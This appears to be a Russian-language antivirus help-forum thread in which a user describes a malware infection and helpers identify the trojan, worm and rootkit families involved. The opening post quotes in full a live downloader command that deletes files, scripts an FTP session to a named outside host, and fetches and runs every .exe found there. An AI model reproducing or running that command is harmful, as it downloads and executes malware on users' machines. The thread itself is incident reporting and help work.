Решена Много вирусов

Статус
В этой теме нельзя размещать новые ответы.

Dukales

Новый пользователь
Сообщения
4
Реакции
0
у меня та же проблема (была - переустановил Windows):
я недавно заметил, что в процессах висит такая комманда:
Cmd /c md SC&cd SC&del /f /s /q *.*&echo open scan.zavan.info>k.x&echo out>>k.x&echo 123>>k.x&Echo mget *.exe>>k.x&Echo bye>>k.x&ftp -i -s:k.x&del k.x&echo for %%i in (*.exe) do start %%i>D.bat&D.bat&del D.bat

с порождённой им ftp -i -s:k.x
Ну я зашёл на этот адрес - там пусто, даже LIST не выполняется. Как сделать так, чтобы эта комманда не запускалась - я не знал и смирился.
Потом мне посчасливилось по несусветной глупости установить некий flowMediaDecoder_60, который представлял из себя ленту новостей с вымогательством :), закрывающей обзор в IE.
На сайте http://www.spyware-ru.com/ прочитал что надо делать - отключил антивирус и запустил ComboFix.exe - на одном из шагов требовалось. Интернет был включен... Видимо на фтп появилась новая подборка свежайших китайских вирусов))). Вот они безболезненно скачались и прорвало... В процессах висело штук 20 их копий, которые запускали друг друга наперебой, когда убиваешь один из них (жаль сразу все не убить - даже в продвинутом procexp нет такой функции), эксплорер нельзя открыть (сначала вообще-то открывал китайские сайты сам по себе). Сам файл ComboFix.exe был удалён ими видимо (а может и показалось). Всё зависло - я перезагрузил машину. Запуская сканирование NOD32 (2.7 версии) они пытались закрыть окно. Сам резидентный модуль был ими деинсталлирован - в процессах его не висело, переустановка ни к чему не приводила. Я создал документ с именем nod32.txt и открыл блокнотом - он закрылся :). Я знал, что есть функция GetWindowText. Всё кончено - подумал я :(.
Потом я не долго думая зашёл на фтп scan.zavan.info и скачал их все и запаковал. До сих пор их сигнатуры не находятся в базах nod32 (10.02.09 числа) - при распаковке - тихо.
8 штук с фтп. И ещё я нашёл на дисках (2 жёстких отцепил перед установкой Windows - чтобы сначала отключить autorun полностью всех типов устройств и скачать базы для nod32 последние предварительно) в корнях какие-то auto.exe и boot.exe - они nod32 определяются как вредоносные. плюс эта "новостная лента" flowMediaDecoder_60.exe. Пароль - virus.
 
Последнее редактирование:
auto.exe - Worm.Win32.AutoRun.ztg (аккуратнее с флешками)
boot.exe - not-a-virus:AdWare.Win32.AdMedia.ed

А также (папка viruses):
Trojan-Downloader.Win32.VB.kmn
Backdoor.Win32.Hupigon.fyvq
Trojan-Downloader.Win32.Agent.bexi


вывод: помойка однако :(

Что неопознанно разошлю вирлабам.

Информация
Вложения удалил т.к. в основном пользователи не имеют достаточной квалификации для работы с мальварой, то они смогут заразится.
 
да уж =( ... помойка - главное все враз скачались.

Скажите пожалуйста, где искать эту комманду?
Нигде я не нашёл - искал программкой autoruns с sysinternals.com

Не подозреваю - всё переустанавливал как резведчик: драйвера с оффсайтов скачивал только, диски отцеплял, авторан выключил по маске 0xFF.
 
Последнее редактирование:
Смените пароли на "критических направлениях".
 
Завершаем анализ:

flowMediaDecoder_60.exe - Trojan.Win32.Agent2.dmq
Rootkit.Win32.Small.uc
Trojan.MulDrop.29482
DDoS.Attack.123
 
похоже батник в автозагрузке. Сделайте лог RSIT посмотрим (интернет не отключаем, для скачивания HJT).
 
дело в том, что я уже переустановил Windows - иначе никак не оживить было систему - поэтому, быть может ценные, следы пребывания этих злосчастных вирусов на моей машине исчезли...
спасибо за помощь.
 
логи RSIT на всякий случай
 
Последнее редактирование:
Приятно смотреть на читсую машину :D
 
Аваст постоянно обнаруживает вирус Win32:Confi [Wrm]

один находиться по адресу C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\... (создает себе папку а сам вирус остаеться в формате *.jpg или *.gif)
другой, с именем файла х, но без расширения находиться по адресу C:\WINDOWS\system32

Причем, если второй аваст благополучно удаляет, то насчет второго он говорит что произошла ошибка или файл используеться другим приложением, приходиться удалять вручную.
помогите избавиться от этого
 
Приветствую.

Для корректной помощи нам необходимо увидеть Ваши логи :)
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху Снизу